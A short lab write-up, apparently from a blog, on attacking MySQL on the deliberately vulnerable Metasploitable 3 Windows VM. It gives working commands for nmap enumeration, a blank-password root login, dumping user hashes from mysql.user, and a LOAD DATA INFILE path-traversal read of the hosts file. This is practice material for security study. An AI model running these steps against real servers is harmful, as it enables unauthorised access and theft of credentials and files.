Metasploitable 3 — MySQL Blank Creds and Local File Read

Everybody loves a database until it gets pwned with two commands by your local script kiddie. Let’s work on the Metasploitable 3, Windows Server 2008 VM once again to kick off some practice.

Enumeration

With no hesitation, we’re launching all of nmap’s mysql enumeration scripts to gain as much information about the target system

nmap -Pn -p3306 --script=mysql-* TARGETIP -v

Blank root Password

From this command we have gotten “root:<empty> — Valid credentials” from the mysql-enum nmap script.

Results from the mysql nmap scripts.

Let’s connect to the mysql service on the Metasploitable 3 system from here. It was also noted that we had to disable SSL to be able to connect.

mysql -u root -h TARGETIP -p --ssl=FALSE 

Successful connection to mysql service.

Databases observed.

MySQL User Enumeration

# Get current user (an all users) privileges and hashes

use mysql;
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
SELECT * FROM mysql.user;

MySQL User Enumeration.

mysql.user enumeration.

Local File Read

# Reading local files on the target system

use test;

CREATE TABLE test (text VARCHAR(100));
Query OK, 0 rows affected (0.230 sec)

LOAD DATA INFILE '../../../../../../../../../\\Windows\\System32\\drivers\\etc\\hosts' INTO TABLE test FIELDS TERMINATED BY '\n';
Query OK, 23 rows affected (0.163 sec)
Records: 23  Deleted: 0  Skipped: 0  Warnings: 0

select * from test;

Local file read of the hosts file on the Windows 2008 server.

We were then able to escape my “c:\wamp\bin\mysql\mysql5.5.20\” directory on the target system to read the hosts file.

How further would you go?

Happy Hacking XD!